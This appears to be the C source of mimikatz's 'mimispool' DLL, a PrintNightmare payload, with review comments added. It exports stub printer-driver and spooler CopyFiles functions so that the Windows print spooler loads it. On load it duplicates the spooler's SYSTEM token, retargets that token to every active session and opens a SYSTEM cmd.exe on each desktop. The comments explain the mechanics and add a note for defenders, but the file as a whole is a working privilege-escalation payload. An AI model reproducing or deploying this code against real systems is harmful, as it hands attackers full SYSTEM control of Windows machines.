/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "mimispool.h"
/*
 * DLL entry point.
 *
 * Only DLL_PROCESS_ATTACH does any work: it calls RunProcessForAll() with
 * "cmd.exe".  Thread attach/detach and process detach are no-ops.  The
 * result of RunProcessForAll() is discarded and TRUE is always returned to
 * the loader, so the host never sees a failed attach.
 *
 * NOTE(review): the work is done inside DllMain, i.e. under the loader
 * lock; the Win32 documentation discourages process creation from here.
 * Behaviour is kept exactly as in the original.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
	UNREFERENCED_PARAMETER(hinstDLL);
	UNREFERENCED_PARAMETER(lpReserved);

	switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		RunProcessForAll(L"cmd.exe");
		break;
	default:
		/* DLL_THREAD_ATTACH / DLL_THREAD_DETACH / DLL_PROCESS_DETACH: nothing to do */
		break;
	}

	return TRUE;
}
// PrintNightMare 2.x - via config file and/or "real driver"
/*
 * Printer-driver export stub: DrvResetConfigCache.
 *
 * Present only so the DLL exposes the export; it performs no work.  The
 * empty-statement body of the original is written as an explicit return.
 */
VOID APIENTRY DrvResetConfigCache()
{
	return;
}
/*
 * Printer-driver export stub: DrvQueryDriverInfo.
 *
 * dwMode     - only DRVQUERY_USERMODE is accepted; any other mode sets
 *              ERROR_INVALID_PARAMETER and returns FALSE.
 * pBuffer    - optional output; when non-NULL and cbBuf holds at least a
 *              DWORD, a single DWORD TRUE is written into it.
 * cbBuf      - size of pBuffer in bytes.
 * pcbNeeded  - written unconditionally with sizeof(DWORD) in the accepted
 *              mode; a NULL pointer here is not checked by either the
 *              original or this rewrite.
 *
 * Returns TRUE only when the DWORD was written.  Note that the original
 * calls SetLastError(ERROR_INSUFFICIENT_BUFFER) on every DRVQUERY_USERMODE
 * call, including the successful one; that is preserved here.
 */
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
{
	BOOL written = FALSE;

	/* guard clause for the single unsupported case */
	if (dwMode != DRVQUERY_USERMODE)
	{
		SetLastError(ERROR_INVALID_PARAMETER);
		return written;
	}

	*pcbNeeded = sizeof(DWORD);

	if ((pBuffer != NULL) && (cbBuf >= sizeof(DWORD)))
	{
		*(DWORD *)pBuffer = TRUE;
		written = TRUE;
	}

	/* set even after a successful write - same as the original */
	SetLastError(ERROR_INSUFFICIENT_BUFFER);

	return written;
}
/*
 * Printer-driver export stub: DrvEnableDriver.
 *
 * iEngineVersion - rejected (ERROR_BAD_DRIVER_LEVEL, FALSE) when below 0x20000.
 * cj             - size of *pded in bytes; rejected the same way when below 0x10.
 * pded           - on success receives driver version 0x20000 and an empty
 *                  function table (pdrvfn = NULL, c = 0).  It is dereferenced
 *                  without a NULL check, as in the original.
 *
 * Returns TRUE when pded was filled, FALSE otherwise.
 */
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
{
	if ((iEngineVersion < 0x20000) || (cj < 0x10))
	{
		SetLastError(ERROR_BAD_DRIVER_LEVEL);
		return FALSE;
	}

	/* advertise a 2.0 driver that exports no DDI functions */
	pded->iDriverVersion = 0x20000;
	pded->pdrvfn = NULL;
	pded->c = 0;

	return TRUE;
}
/*
 * Printer-driver export stub: DrvDisableDriver.
 *
 * Counterpart of DrvEnableDriver(); nothing was allocated there, so there
 * is nothing to release here.  The original's empty statement becomes an
 * explicit return.
 */
VOID APIENTRY DrvDisableDriver()
{
	return;
}
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
// PrintNightMare 4.x - via CopyFiles
/*
 * Spooler CopyFiles export stub: GenerateCopyFilePaths.
 *
 * Every parameter is ignored and no output buffer is touched; the function
 * exists so the export is present (see the "via CopyFiles" comment above)
 * and always reports ERROR_SUCCESS.  The (void) casts replace the
 * UNREFERENCED_PARAMETER macros of the original and have the same effect.
 */
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
	(void)pszPrinterName;
	(void)pszDirectory;
	(void)pSplClientInfo;
	(void)dwLevel;
	(void)pszSourceDir;
	(void)pcchSourceDirSize;
	(void)pszTargetDir;
	(void)pcchTargetDirSize;
	(void)dwFlags;

	return ERROR_SUCCESS;
}
/*
 * Spooler CopyFiles export stub: SpoolerCopyFileEvent.
 *
 * Ignores the printer name, registry key and event code and always returns
 * TRUE, i.e. every copy-file event is acknowledged without action.  The
 * (void) casts stand in for the original's UNREFERENCED_PARAMETER macros.
 */
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
{
	(void)pszPrinterName;
	(void)pszKey;
	(void)dwCopyFileEvent;

	return TRUE;
}
// Kiwi payload - SYSTEM on all active desktop(s)
/*
 * Starts szProcess once in every session that WinStationEnumerateW reports
 * as State_Active, using a primary token duplicated from the calling
 * process's own token.  Because the token comes from GetCurrentProcess(),
 * the children run with whatever identity the host process has (the
 * comment above says SYSTEM, i.e. when this DLL is loaded by the spooler).
 *
 * szProcess - passed as lpApplicationName to CreateProcessAsUser with a
 *             NULL command line; it is not modified here.
 *
 * Returns: always FALSE.  `status` is initialised to FALSE and never
 *          assigned again, so a caller cannot tell whether any process was
 *          started; DllMain() discards the result anyway.
 *
 * Resource handling follows the nesting: each acquisition is released at
 * the matching level of the if-chain (sessions -> Environment -> hNewToken
 * -> hToken).  All failures are silent; GetLastError is not recorded.
 *
 * Defender note: each loop iteration yields a process creation whose parent
 * is the host process and whose token session id was rewritten to the
 * target session (usually different from the parent's own session) - a
 * useful pairing for process-creation telemetry.
 */
BOOL RunProcessForAll(LPWSTR szProcess)
{
	BOOL status = FALSE;                 // never set to TRUE anywhere below
	STARTUPINFO si = { 0 };
	PROCESS_INFORMATION pi = { 0 };
	HANDLE hToken, hNewToken;            // only used after the call that fills them succeeds
	DWORD i, count;
	LPVOID Environment;
	PSESSIONIDW sessions;                // only read inside the WinStationEnumerateW success branch

	si.cb = sizeof(si);
	si.lpDesktop = L"winsta0\\default";  // interactive window station / default desktop

	// full-access handle to the host process's own token
	if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
	{
		// CreateProcessAsUser needs a primary token; the impersonation level
		// requested is only SecurityIdentification
		if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
		{
			// environment block built for the user of the duplicated token,
			// without inheriting the caller's environment (FALSE)
			if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
			{
				// winsta.dll enumeration; sessions/count are valid only on success
				if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
				{
					for (i = 0; i < count; i++)
					{
						// only sessions currently marked active; disconnected,
						// listening, etc. are skipped
						if (sessions[i].State == State_Active)
						{
							// retarget the duplicated token to this session so the child
							// appears on that session's desktop; changing TokenSessionId
							// normally requires SeTcbPrivilege, hence the SYSTEM host assumption
							if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
							{
								// new console per child; CREATE_UNICODE_ENVIRONMENT because
								// the block from CreateEnvironmentBlock is Unicode
								if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
								{
									// the child is neither waited on nor tracked; just drop the handles
									CloseHandle(pi.hThread);
									CloseHandle(pi.hProcess);
								}
							}
						}
					}
					// sessions was set by the successful enumeration; guard kept from the original
					if (sessions)
					{
						WinStationFreeMemory(sessions);
					}
				}
				DestroyEnvironmentBlock(Environment);
			}
			CloseHandle(hNewToken);
		}
		CloseHandle(hToken);
	}

	return status;  // still FALSE - see header comment
}